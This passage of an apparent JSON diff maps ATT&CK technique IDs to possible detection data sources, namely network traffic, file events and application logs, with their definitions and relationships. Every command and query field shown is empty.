"source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + 
"definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1491.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1114.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + 
"Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1114.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
